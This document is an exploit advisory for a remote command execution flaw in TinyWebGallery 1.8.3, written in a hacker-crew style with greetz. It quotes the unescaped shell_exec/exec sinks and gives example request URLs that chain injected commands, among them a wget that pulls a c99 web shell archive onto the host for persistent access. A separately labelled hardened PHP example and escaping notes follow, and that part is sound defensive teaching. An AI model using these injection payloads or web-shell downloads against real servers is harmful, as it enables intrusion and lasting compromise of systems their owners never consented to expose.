<======================================================>
[»] TinyWebGallery 1.8.3 Remote Command Execution
<======================================================>

Author: Expl0!Ts --------> My Best t34m -----> "BaC , RoBert MilEs , Bl4ck_ID"
Software: http://www.tinywebgallery.com/dl.php?file=twg_latest
Tested on: Windows XP

!-----> THnKs T0 My ALLAH
<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::>
bIG tHnkS T0 :-> vbspiders.com & Dz4all.com www.2cto.com & isecur1ty.org
<::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::>

<=================Exploit====================>

-=[ vuln c0de ]=- 1

1) --------------> filefunctions.inc :

    function execute_command ($command) {
        global $use_shell_exec;
        ob_start();
        set_error_handler("on_error_no_output");
        if (substr(@php_uname(), 0, 7) == "Windows"){
            // Make a new instance of the COM object
            $WshShell = new COM("WScript.Shell");
            // Make the command window but dont show it.
            $oExec = $WshShell->Run("cmd /C " . $command, 0, true);
        } else {
            if ($use_shell_exec) {
                shell_exec($command);      <--------------- error 1)
            }
            // ... remainder of the function not quoted in the advisory
        }
    }

$command reaches shell_exec() without any filtering or escaping, so a value such as "id;pwd;wget ..." is executed by the shell as a chain of separate commands. Note that the Windows branch hands the same unfiltered string to cmd /C through WScript.Shell, which is the branch exercised on the stated test platform.

Example (angle brackets mark placeholders; "(path)" is the TinyWebGallery install directory):

    http://www.2cto.com/(path)/inc/filefunctions.inc?command=<id>;<pwd>;<wget http://shell.org/c99.zip>

-=[ vuln c0de ]=- 2

2) --------------> info.php :

    if ($use_shell_exec) {
        shell_exec($command);
    } else {
        exec($command . " > /dev/null");      <--------------- error 2)
    }

Same sink, same problem: both shell_exec() and exec() run $command unescaped, and the appended "> /dev/null" only suppresses the output, it does not constrain what runs.

Example:

    http://www.2cto.com/(path)/info.php?command=<id>;<pwd>;<wget http://shell.org/c99.zip>

Caveat for anyone reproducing this: the quoted lines show the sink, not the source. The requests above only reach shell_exec()/exec() if the script populates $command from the query string (for instance with register_globals enabled) and then executes this code path; confirm that against the installed version rather than relying on the snippet alone. The wget stage in the examples pulls a web shell archive (c99.zip) onto the host so that access persists beyond the single injected request.

<------------------------------------------------------------------------------------------------------------------------------------------------------------------->
Greetz: !> BaC ,!> Black_ID ,!> Kala$nikoV ,!> Robert miles ,!> Dr.Black_ID , !> AHmEd-HaMaImi , Bel-AiSa , To-KhAlEd
<------------------------------------------------------------------------------------------------------------------------------------------------------------------->

EnJoY o_O
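As an added example (not part of the original advisory and not TinyWebGallery's own code), here is the sink shared by both quoted snippets in its vulnerable shape beside a hardened replacement. The function names, the allow-listed tools and the `pictures` base directory are assumptions for illustration:

```php
<?php
// Added example, not TinyWebGallery's code. Function names, the allow-list
// contents and the 'pictures' base directory are assumptions for illustration.

// The shape both quoted snippets share: whatever string is in $command goes to
// the shell unchanged. If $command is filled from the request (register_globals,
// or an explicit $_GET['command']), "id;pwd;wget ..." runs as three commands.
function execute_command_vulnerable($command) {
    return shell_exec($command);
}

// Hardened shape. The caller picks an action from a fixed table and may pass
// one path argument. Request data never becomes part of the command string
// except through escapeshellarg(), and only after the path has been confined.
function execute_command_safe($action, $path = null) {
    // Hypothetical allow-list of the external tools the gallery needs.
    $allowed = array(
        'disk_usage' => 'df -h',       // takes no argument
        'identify'   => 'identify',    // ImageMagick, takes one image path
    );
    if (!is_string($action) || !isset($allowed[$action])) {
        throw new InvalidArgumentException('unknown action');
    }
    $cmd = $allowed[$action];

    if ($path !== null) {
        // Resolve symlinks and '..' first, then require the result to sit inside
        // the gallery's picture directory. realpath() returns false for missing
        // files, which rejects the injected string as a path as well.
        $base = realpath(__DIR__ . '/pictures');
        $real = realpath($path);
        if ($base === false || $real === false
                || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
            throw new InvalidArgumentException('path outside gallery');
        }
        // escapeshellarg() single-quotes the value, so ';', '|', '`', '$(' and
        // newlines are literal characters to the program, not shell syntax.
        $cmd .= ' ' . escapeshellarg($real);
    }
    return shell_exec($cmd);
}

// Constructed input: the payload from the advisory's example URL.
$injected = 'id;pwd;wget http://shell.org/c99.zip';

// Vulnerable: uncomment to watch three commands execute.
// execute_command_vulnerable($injected);

// Hardened: the payload is neither an action name nor a file inside the
// gallery, so both uses are rejected before anything reaches the shell.
foreach (array(
    array($injected, null),
    array('identify', $injected),
) as $call) {
    try {
        execute_command_safe($call[0], $call[1]);
        echo "ran\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

On the Windows branch of the original code (cmd /C via WScript.Shell) escapeshellarg() is weaker than on Unix: it wraps the value in double quotes and replaces `%` and `!` with spaces rather than neutralising every cmd metacharacter, so the fixed allow-list of commands, not the escaping, is what carries the guarantee there. In either case the rule is the same: request data may select among predefined commands and may become a quoted argument, but it must never be concatenated into the command string itself.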